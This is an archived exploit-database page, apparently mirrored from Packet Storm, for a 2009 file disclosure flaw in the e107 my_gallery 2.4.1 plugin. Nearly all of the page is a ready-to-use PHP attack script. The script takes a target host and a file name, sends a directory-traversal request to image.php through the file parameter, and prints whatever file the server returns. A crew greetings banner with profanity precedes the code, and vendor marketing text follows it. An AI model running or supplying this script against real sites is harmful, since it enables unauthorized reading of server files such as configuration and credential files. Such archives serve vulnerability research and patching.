Lucene search
K

e107 my_gallery 2.4.1 File Disclosure

🗓️ 23 Jul 2009 00:00:00Reported by Vrs-hCkType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

e107 my_gallery 2.4.1 File Disclosure vulnerability in image.ph

Code
`MainHack BrotherHood [ http://news.serverisdown.org ]  
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang  
H312Y yooogy mousekill }^-^{ loqsa zxvf martfella  
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke  
  
FUCK TERORIS!!  
  
*/  
  
$vuln = '/e107_plugins/my_gallery/image.php?file=';  
$trasv = '/../../../../../../../../../../../../../../..';  
  
echo "<form method=POST>  
Web 2 XPL : <input type=\"text\" name=\"host\" size=30>  
File 2 Read : <input type=\"text\" name=\"file\" size=30>  
<input type=submit value=\"Go!!!\" name=\"_xpl\">  
<br><br>";  
  
if ($_POST['_xpl']) {  
$data .= "GET /{$vuln}{$trasv}{$file} HTTP/1.1\r\n";  
$data .= "Host: {$host}\r\n";  
$data .= "Connection: close\r\n\r\n";  
$html = sendpacket($host,$data);  
print '<pre>'.htmlspecialchars($html).'</pre>';  
}  
  
echo "</form>";  
  
function sendpacket($host,$data) {  
if (!$sock = @fsockopen($host,80)) {  
die("[!] Connection refused, try again!\n");  
}  
fputs($sock,$data);  
while (!feof($sock)) { $html .= fgets($sock); }  
fclose($sock);  
return $html;  
}  
  
?>  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation